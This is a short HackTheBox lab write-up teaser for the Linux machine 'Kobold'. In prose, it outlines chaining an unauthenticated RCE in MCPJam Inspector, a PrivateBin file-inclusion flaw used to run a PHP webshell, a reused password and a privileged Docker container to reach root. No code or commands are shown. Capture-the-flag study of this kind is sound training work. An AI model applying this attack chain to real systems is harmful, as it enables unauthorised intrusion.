Kobold HackTheBox Writeup - Season10
SUMMARY
Kobold is a Linux machine from HackTheBox Season 10 that chains 2 CVEs across MCPJam, PrivateBin, and Docker to achieve full root access. Virtual host enumeration on kobold.htb reveals two subdomains running PrivateBin 2.0.2 and running MCPJam Inspector 1.4.2 respectively. MCPJam Inspector 1.4.2 is vulnerable to CVE-2025-49596, a critical unauthenticated RCE caused by missing authentication between the Inspector client and proxy. Exploiting this delivers an initial shell to the victim machine.
Internal port enumeration reveals port 8080 running the same PrivateBin 2.0.2 instance as the one discovered in our initial enumeration. This version is vulnerable to CVE-2025-64714, a Local File Inclusion via the template-switching cookie. Writing a PHP webshell to the world-writable data directory and triggering it through the LFI achieves RCE inside the PrivateBin Docker container.
Enumerating mounted paths inside the container exposes the PrivateBin configuration file which leaks a reused password. This grants access to the Arcane Docker management panel on port 3552. A privileged MySQL container is created via Arcane with the host filesystem mounted, allowing the root flag to be read directly.
PATH TO FOLLOW
- Reconnaissance
- Virtual Host Enumeration
- MCPJam Inspector 1.4.2 - CVE-2025-49596
- Initial Shell
- Internal Port Enumeration
- PrivateBin LFI - CVE-2025-64714
- PHP Webshell Upload
- Container Mount Enumeration
- Arcane Docker Management Panel Access
- Privileged Escalation through container creation
CONTENT WILL BE RELEASED ONCE THE MACHINE IS RETIRED